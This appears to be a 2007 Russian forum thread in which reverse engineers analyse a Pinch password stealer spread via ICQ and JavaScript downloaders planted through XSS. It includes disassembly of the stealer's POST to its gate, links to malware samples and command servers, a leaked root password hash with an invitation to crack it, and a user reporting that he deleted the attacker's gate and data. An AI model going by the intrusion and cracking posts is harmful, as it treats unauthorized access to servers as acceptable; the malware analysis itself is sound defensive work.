Сейчас на форуме: johnniewalker, Kybyx, testrev1337, bedop66938, vsv1 (+7 невидимых)

 eXeL@B —› Крэки, обсуждения —› Исследование вирусов
<< 1 ... 18 . 19 . 20 . 21 . 22 . 23 . 24 . 25 . 26 . 27 . 28 ... 47 . 48 . >>
Посл.ответ Сообщение

Ранг: -0.2 (гость)
Активность: 0=0
Статус: Участник

Создано: 13 октября 2006 23:15 · Поправил: Модератор
· Личное сообщение · #1

В этом топике происходит исследование малвари: вирусни, троянов, как их вычистить и тд.



Ранг: 12.0 (новичок)
Активность: 0.010
Статус: Участник

Создано: 23 декабря 2007 18:09
· Личное сообщение · #2

>Дело так было:
>приходит мне письмо с текстом:Привет! Как утро? Уже похолодало, наверное скоро зима будет, а так ещё >охота теплых деньков! Я на этих выходных в парк ходила с подругой, сфоткалась там пару раз, фотку >посмотри в письме, прикольно? если сегодня будет время напиши мне.
>и файлик с_подругой.exe (даже картинка sfxовая)
>прошло время...
>и я всётаки заэкзечил эту фигню и терь чувствую что что-то не так.
>Короче, расскажите мне пожалуйста что эта штука у меня на компе делает!?

меньше нужно всяких гнилых файлов открывать...




Ранг: 233.1 (наставник), 30thx
Активность: 0.210
Статус: Участник

Создано: 23 декабря 2007 21:19
· Личное сообщение · #3

kas

Создано: 13 октября 2006 23:15:04

-----
AutoIt




Ранг: 12.8 (новичок)
Активность: 0.010
Статус: Участник

Создано: 23 декабря 2007 22:56
· Личное сообщение · #4

Вот мне нипанятна, если на сайт долбанули иксэсэс и при заходе на форум благим матом орет каспер, после его отключения реверсинга пошифрованого ява скрипта, ссыль ведет на китайчегов, основной сайт зарыт "закрыт по каим-то там причинам, свяжитесь с супортом" (перево мой). параша грузить микромодуль, который в свою очередь грузит пинча все с тогоже китайчега. НО! есть огромные подозрения что параша славянская, то бишь россейская потому что засранчег микромодуль перед попыткой качнуть пинча смотрел на доступность я.ру и маил.ру, виртуалки под рукой не было, поэтому пинча запускать не стал. так к чему я это все писал. Можт замутим тему "реверс засранчегов и иже с ними?" и аффтаров засранцев сдавать в фсб, органам респект от начальнеков, нам тоже какойнить бонус, отдельные нары например



Ранг: 309.8 (мудрец), 21thx
Активность: 0.170
Статус: Участник

Создано: 23 декабря 2007 23:12 · Поправил: SLV
· Личное сообщение · #5

Demrak, давай, флаг в руки и барабанные палочки в жо... как говорится. попробуй выловить и зареверсить чтото сложнее пенча...

-----
Shalom ebanats!




Ранг: 222.2 (наставник), 115thx
Активность: 0.140.01
Статус: Участник

Создано: 23 декабря 2007 23:15
· Личное сообщение · #6

Demrak убей сибя. Никто тут никого в фсб сдавать не собирается, иначе тут бы уже весь форум посадили а тема "реверс засранчегов и иже с ними" уже существует - просто она не так немного называется - "Прислали трояна..успешно".

-----
все багрепорты - в личные сообщения





Ранг: 990.2 (! ! !), 380thx
Активность: 0.680
Статус: Модератор
Author of DiE

Создано: 24 декабря 2007 01:02
· Личное сообщение · #7

Demrak пишет:
параша грузить микромодуль


а можно файлики лицезреть?

-----
[nice coder and reverser]




Ранг: 12.8 (новичок)
Активность: 0.010
Статус: Участник

Создано: 24 декабря 2007 02:00 · Поправил: Demrak
· Личное сообщение · #8

К сожалению уже нет, я их недавно удалил, но принцип действия был таков, на хост подверженый xss появлялся кусок кода на яваскрипте который грузил другой кусок яваскрипта, в котором уже пробовались все уязвимости браузеров на тот момент времени (имхо), по касперу параша называлась psyme (две буквы) использовала не только adodb но и метафайл и все последующее сам скрипт который тестировал браузер на уязвимость весил достаточно прилично, если не изменяет память то около 120 килограмм, грузил с китайчегов "*.cn" exe файл, который по идее должен был сохранится в c:\mnt*** что-то там, файл (микро параша) запакован чем-то сейчас уже не вспомню но распаковывался на раз два (вроде upx), вот эта мелкая гадость смотрела на ya.ru и mail.ru и в зависимости от их работтоспособности грузила еще одну херь, которую касперь узнавал как пинч(вроде d). Дальше реверсить не стал по причине обосцаки и не наличия виртуальной машинки (засцал запускать наживую). Потом через неделю все документы по этой теме похерил так как они валялись в корне диска c:

и тупо мельтешили.



Ранг: 9.5 (гость)
Активность: 0.010
Статус: Участник

Создано: 24 декабря 2007 02:42 · Поправил: VA_DOS
· Личное сообщение · #9

Hellspawn пишет:
Demrak пишет:
параша грузить микромодуль

а можно файлики лицезреть?


Да http://viruslist.com/ http://viruslist.com/ посмотри - самое сложное, что грузит Psyme, это - Agent-даунлоадер. Ничего интересного.



Ранг: 12.8 (новичок)
Активность: 0.010
Статус: Участник

Создано: 24 декабря 2007 02:59 · Поправил: Demrak
· Личное сообщение · #10

VA_DOS естественно ничего интересного, каспер всю эту канитель на самой зачаточной стадии попросил убить, интересно то откуда все это грузится и куда все пересылается. Вот в чем соль!



Ранг: 9.5 (гость)
Активность: 0.010
Статус: Участник

Создано: 24 декабря 2007 03:13
· Личное сообщение · #11

Ну файлики выложи - посмотрим. У Каспера они обычно после удаления сохраняются в Резервном хранилище.



Ранг: 12.8 (новичок)
Активность: 0.010
Статус: Участник

Создано: 24 декабря 2007 05:26 · Поправил: Demrak
· Личное сообщение · #12

бляха, не получается выложить полные листинги, кароч я обшибся, это не psyme был а remora.bg все файлы и все мои выкладки в архиве пасс 11111
Чорт еще и не дает выложить, тогда http://xmaker.ru/file.zip http://xmaker.ru/file.zip
размер около 40 килограмм, кстати все сайты до сих пор работают, насчет пинчевского гейта сказать не могу, не реверсил. (забоялся)




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 24 декабря 2007 10:42
· Личное сообщение · #13

Demrak
Не этот сайт китайчегов hxxp://xanjan.cn ?
Если оно, то уже разбирали на предыдущих страницах.
Пустую страницу якобы выдаёт или же страницу что сайт заблокирован, но на самом деле это фуфел и на этой странице до Х джавы с сплоитами.
И сервак у китайцев под это дело выделеный.

-----
Computer Security Laboratory




Ранг: 12.8 (новичок)
Активность: 0.010
Статус: Участник

Создано: 24 декабря 2007 16:02
· Личное сообщение · #14

[HEX] не там что-то типа aero.cn




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 24 декабря 2007 17:29 · Поправил: [HEX]
· Личное сообщение · #15

... уже не надо.

-----
Computer Security Laboratory




Ранг: 222.2 (наставник), 115thx
Активность: 0.140.01
Статус: Участник

Создано: 28 декабря 2007 13:03 · Поправил: HandMill
· Личное сообщение · #16

Только что мне в асю пришло:
Запрос авторизации
Эта программа поможет Вам получить
ответ на то, как поступить или что сделать в той или иной ситуации.
[url=HTTP://yesorno.1gb.in/soft/soft/yesorno.zip
]HTTP://yesorno.1gb.in/soft/soft/yesorno.zip
[/url]
какая-то фигня, в архиве - "yesorno.exe" - это дроппер(вроде даже криптованный чем-то), который втупую извлекает файлы в %temp% в частности у меня он извлёк только один файл - "yesorno.exe"(больше я наверное не дал, прервав его на ShellExecuteExA). То что он извлёк - написано на Delphi и паковано UPX'ом. Я его подебажил и вроде бы ничего подозрительного не нашёл. У кого какие будут соображения по этому поводу?

-----
все багрепорты - в личные сообщения





Ранг: 106.6 (ветеран)
Активность: 0.10
Статус: Участник

Создано: 28 декабря 2007 13:12
· Личное сообщение · #17

HandMill
на прошлой странице мне приходил такой же запрос авторизации с этим же файлом, правда тогда он лежал на webfile.ru
[HEX] пишет:
VAD87
Пинч с гейтом hxxp://x4kep.1gb.in/gate/gate.php

отчетов нет, так как видать какой то чайник впаривает троянчега

41393381 -rwxrwx--- 1 vhostsadm vhosts 1381 26.11.2007 09:34 gate.php
41393382 -rwxrwx--- 1 vhostsadm vhosts 648 26.11.2007 09:34 filelist.php
48171061 drwxrwx--- 2 vhostsadm vhosts 4096 15.12.2007 02:13 reps




Ранг: 103.1 (ветеран), 3thx
Активность: 0.070.01
Статус: Участник

Создано: 28 декабря 2007 13:28 · Поправил: Styx
· Личное сообщение · #18

HandMill
Согласно истории должен быть Пинч (:
Твой файл пока не смотрел.

Да, действительно пинч. В аське в последнее время с этой темой (yes/no) очень часто приходят сообщения.

-----
Crack your mind, save the planet




Ранг: 222.2 (наставник), 115thx
Активность: 0.140.01
Статус: Участник

Создано: 29 декабря 2007 10:29
· Личное сообщение · #19

Хм .... я чё-то там пинча то не нашёл...
Styx, рассказывай как нашёл и где
И действительно ли там пинч?

-----
все багрепорты - в личные сообщения





Ранг: 126.7 (ветеран)
Активность: 0.140
Статус: Участник
#CCh

Создано: 29 декабря 2007 12:08 · Поправил: Ice-T
· Личное сообщение · #20

xz, я там чето ниче не нашел.. вот дельфовый файло http://uafile.com/804060 .. гляньте мб кто-нибудь еще и выложите на вирустотал, это гавно много весит..

-----
invoke OpenFire




Ранг: 103.1 (ветеран), 3thx
Активность: 0.070.01
Статус: Участник

Создано: 29 декабря 2007 12:32 · Поправил: Styx
· Личное сообщение · #21

В аттаче дропнутые файлы svchost.exe и есть пинч, второй наверно нормальный, не смотрел

Дета в этом районе к гейту коннектится:
131423EF . 50 PUSH EAX ; /<%u>
131423F0 . 68 5B851413 PUSH 1314855B ; |<%s> = "Content"
131423F5 . 68 53851413 PUSH 13148553 ; |<%s> = "Content"
131423FA . 68 A6A81613 PUSH 1316A8A6 ; |<%s> = ""
131423FF . 68 19701713 PUSH 13177019 ; |Format = "POST /gate/gate.php HTTP/1.0",CR,LF,"Host: %s",CR,LF,"%s-Type: application/x-www-form-urlencoded",CR,LF,"Connection: Keep-Alive",CR,LF,"Pragma: no-cache",CR,LF,"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Info"...
13142404 . 57 PUSH EDI ; |s
13142405 . E8 00550000 CALL <JMP.&user32.wsprintfA> ; \wsprintfA


у меня он чета на вмваре падает, разбираться лень

3a39_29.12.2007_CRACKLAB.rU.tgz - dropped.7z

-----
Crack your mind, save the planet





Ранг: 126.7 (ветеран)
Активность: 0.140
Статус: Участник
#CCh

Создано: 29 декабря 2007 12:32 · Поправил: Ice-T
· Личное сообщение · #22

Styx нихера там нету.. www.virustotal.com/ru/resultado.html?a13def1212daec99e2a2876378fcf33e

мы похоже о разный фалах говорим =) я смотрел, тот что хэнд выложил..

-----
invoke OpenFire




Ранг: 222.2 (наставник), 115thx
Активность: 0.140.01
Статус: Участник

Создано: 29 декабря 2007 12:45
· Личное сообщение · #23

Точно!
Ice-T речь об одних и тех же файлах. Я просто не дал дропперу дропать оставшиеся файлы Он сперва действительно извлекает нормальный ЕХЕ, и потом следом за ним - svchost.exe, который и есть пинч. Styx, спасибо за науку

-----
все багрепорты - в личные сообщения





Ранг: 126.7 (ветеран)
Активность: 0.140
Статус: Участник
#CCh

Создано: 29 декабря 2007 12:47
· Личное сообщение · #24

гы.. лол)) я тоже тормознул на ShellExecute... кидесы своей тупостью сбили с толку =D

-----
invoke OpenFire





Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 29 декабря 2007 14:36
· Личное сообщение · #25

Styx
Тот же пинч с тем же гейтом
x4kep.1gb.in/gate/gate.php
если хотите прикрыть лавочку письмо сюда abuse@1gb.in

-----
Computer Security Laboratory




Ранг: 103.1 (ветеран), 3thx
Активность: 0.070.01
Статус: Участник

Создано: 29 декабря 2007 17:19 · Поправил: Styx
· Личное сообщение · #26

[HEX]
Я уже писал, ответов не приходило пока, но репортов там со вчера уже навалом ...
Может кто-нить еще напишет?

-----
Crack your mind, save the planet




Ранг: 222.2 (наставник), 115thx
Активность: 0.140.01
Статус: Участник

Создано: 29 декабря 2007 18:19
· Личное сообщение · #27

Styx, отписался, но думаю что лавку прикроют только после нового года - админы отмечают наверное

-----
все багрепорты - в личные сообщения





Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 29 декабря 2007 18:25 · Поправил: [HEX]
· Личное сообщение · #28

Если надо, то я могу покилять репорта? Надо?

Если сбрутите пасс рута, то и сервак ваш
root:!$1$NiGcJWUs$mR3vnVCoUtng/26T3e0Gg.:13452:0:99999:7:::

Ну и еще если кто будет писать письмо в абузу, то пишите сразу заодно и еще один его сайтик hxxp://www.x4kep2.1gb.in/gate/gate.php

-----
Computer Security Laboratory




Ранг: 103.1 (ветеран), 3thx
Активность: 0.070.01
Статус: Участник

Создано: 29 декабря 2007 18:57
· Личное сообщение · #29

[HEX]
Я килял, за день штук 30 приходит

-----
Crack your mind, save the planet





Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 29 декабря 2007 18:57
· Личное сообщение · #30

В общем грохнул шлюз и отчеты. Хотя наверника этот засранец создаст заново где нить, но мы его и там достанет

-----
Computer Security Laboratory




Ранг: 222.2 (наставник), 115thx
Активность: 0.140.01
Статус: Участник

Создано: 29 декабря 2007 22:24
· Личное сообщение · #31

[HEX], респект! .... нет слов .... бурные и продолжительные апплодисменты в ваш адрес!
З.Ы.: ложи сервак к чёртовой бабушке

-----
все багрепорты - в личные сообщения



<< 1 ... 18 . 19 . 20 . 21 . 22 . 23 . 24 . 25 . 26 . 27 . 28 ... 47 . 48 . >>
 eXeL@B —› Крэки, обсуждения —› Исследование вирусов
Эта тема закрыта. Ответы больше не принимаются.
   Для печати Для печати